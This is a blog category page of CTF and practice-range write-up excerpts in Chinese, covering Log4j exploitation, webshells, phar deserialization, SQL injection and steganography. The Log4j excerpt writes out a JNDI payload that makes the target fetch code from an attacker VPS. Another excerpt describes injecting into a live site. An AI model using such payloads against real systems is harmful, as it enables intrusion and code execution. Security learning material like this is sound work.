ctf
文章平均质量分 79
旧目难忘
专注作业14年,并且持续关注。
展开
-
MSF与哥斯拉Godzilla
需要一台公网VPS,并在VPS部署msf。msf部署在内网是不太行的(除非搞个端口映射)。本机安装好哥斯拉原创 2022-08-24 11:03:06 · 1828 阅读 · 0 评论 -
掌控者-封神台-Apache Log4j任意代码执行复现
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结一、工具JNDIExploit-1.2-SNAPSHOT.jar二、靶场看网页源码猜测就是username和password为注入点三、步骤vps有java环境java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP成功运行向密码框填入${jndi:ldap://vps的IP:1389/Basic/Comm.原创 2022-04-06 23:37:41 · 5812 阅读 · 3 评论 -
封神台-掌控者新靶场 - Kali系列4题
新靶场 - Kali系列【4题】Kali渗透 - Sqlmap实操靶场原创 2022-03-11 22:53:01 · 12855 阅读 · 7 评论 -
BUUCTF-Real
BUUCTF-Real原创 2022-03-08 12:22:29 · 5019 阅读 · 0 评论 -
phar://反序列化的利用【windows远程登录】
前言一、环境搭建二、详细解释1.phar反序列化2.关键13.关键2三、运行测试四、总结前言看到CTF很多题都有关于phar://绕过文件上传配合反序列化利用的。但是实战中大概率不存在这么巧合的点。在了解phar://时,看很多博客都是写入phpinfo()来执行的。我突发脑洞,既然可以执行phpinfo,那么可不可以写马获得shell呢?由于对php对象不是很了解,踩了很多坑记录一下。windows server 2008、php5.5.38、...原创 2021-07-16 14:40:33 · 741 阅读 · 2 评论 -
Mysql注入实战
mysql注入【实战】-报错注入与布尔盲注报错注入布尔盲注请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。未经过授权,禁止非法测试。报错注入靶场如图。没有验证码防止爆破。打开burp,试试有没有SQL注入。burp抓包如下:居然有错误回显,那没得说了。直接上sqlmap,但是没有成功。不知道为什么,显示404 not found好吧。那就借助burp半自动好了。查看用户user(),database(),version()refurl=&us原创 2021-07-14 00:25:28 · 207 阅读 · 0 评论 -
URL编码及其其他编码问题
目录URL编码ASCII与拓展的ASCII显然,有些ASCII可打印字符必须编码才能传输抓包查看URL编码后的数据unicode编码、utf-8编码、UCS、UTFANSI、gb系列、Big-5特殊情况下的URL编码(表单提交)文件存储与编码URL解码总结这篇博客接上一篇由XCTF-favorite_number引发的PHP 数组问题与URL编码引出的编码问题URL编码URL编码是为了解决url中 可能存在歧义的字符以及不在网络标准RFC1738中规定的字符。RFC3986文档规定,Url中只允许原创 2021-03-14 23:40:04 · 2253 阅读 · 0 评论 -
由XCTF-favorite_number引发的PHP 数组问题与URL编码引出的编码问题
PHP数组这个ctf题有很多大佬的WP就不写了讨论PHP数组问题(数字索引数组)题目本地模拟这个ctf题有很多大佬的WP就不写了第一个比较是数组的强等于 但是由要求两个数组的第一个元素不等WP的payloadstuff[4294967296]=admin&stuff[1]=user&num=123讨论PHP数组问题(数字索引数组)实验环境:WINDOWS10,PHPstudy(Apache2.4.39,php5.5.9nts)在 PHP 中,有三种数组类型:• 索引数组原创 2021-03-13 23:03:05 · 280 阅读 · 0 评论 -
XCTF-fakebook
XCTF-fakebook----做题萌新的记录思考上第一步:浏览所有环境第三步 敏感目录扫描第二步:找出漏洞所在下查看御剑的扫描结果那怎么利用SSRF呢??总结萌新的记录萌新记录一下这个题,个人感觉这个题比较有综合性。思考第一次总结一下WEB题思路,本次解题想法来自诸多大佬的博客。上第一步:浏览所有环境浏览整个网站环境,发现有两个连接,login 和join。加上首页index,目前发现三个,然后F12分别查看index源码,没有发现什么线索。然后有join和login,多半是自己创建账号原创 2021-03-12 22:43:02 · 670 阅读 · 0 评论 -
bugku【小猪佩奇】
小猪佩奇参考的大佬博客,主要完善细节参考的大佬博客,主要完善细节参考大佬博客链接 URL首先是完全没有思路,然后提示有给作者的名字 然后百度发现了一篇csdn 出题者的提示然后还是不会,是一个字典,难道与压缩包有关???还是或者说带密码的图片隐写??这个 LSB隐写加密的思路 和 相关脚本 emmm 大佬们太强了,本菜鸡只有照葫芦画瓢了。。。。脚本链接 github 两个脚本 lsb 和 crypt字典链接, 自行百度,github上有 算了勤快一点,点这里 然后ctrl+s保存就可以原创 2021-03-04 23:00:07 · 828 阅读 · 3 评论 -
BUGKU-MISC【善用工具】
【善用工具】下载题目文件解压,有个hint.png 直接010e 发现是txt文件在txt文件最后面发现一串字符。。。。。(菜鸟不知道是什么编码,问了群里大佬,说是uuencode+base85)uuencode 解码网址 url解码结果:keyis91;utF$jAQDfoZ.@:s-关键的字符串:91;utF$jAQDfoZ.@:s-base85解码结果:KEYisCamouflage关键字符串:Camouflageemmm 然后对Camouflage各种思考都不得其解 联系到善用工原创 2021-02-16 10:48:13 · 741 阅读 · 0 评论 -
CTF-misc-----buuctf-FLAG
CTF-MISCBUUctf misc-> FLAG最近做buuctf-misc,在FLAG卡了很久。因为没有提示,所以度了一下,有一个博客,但是不详细,故在这再写一下MISC-图片右键—属性,看大小(可能藏文件),看备注之类的linux下用foremost命令分离,windows用一个我忘了名字的exe(可找我要)。看看有没有结果ultraedit查看具体内容,观察有没有特殊情况;或者上stego,然后各种analysis都试试。gif可以用stego帧查看,然后就是LSB 隐写,r原创 2020-05-24 12:42:52 · 4884 阅读 · 0 评论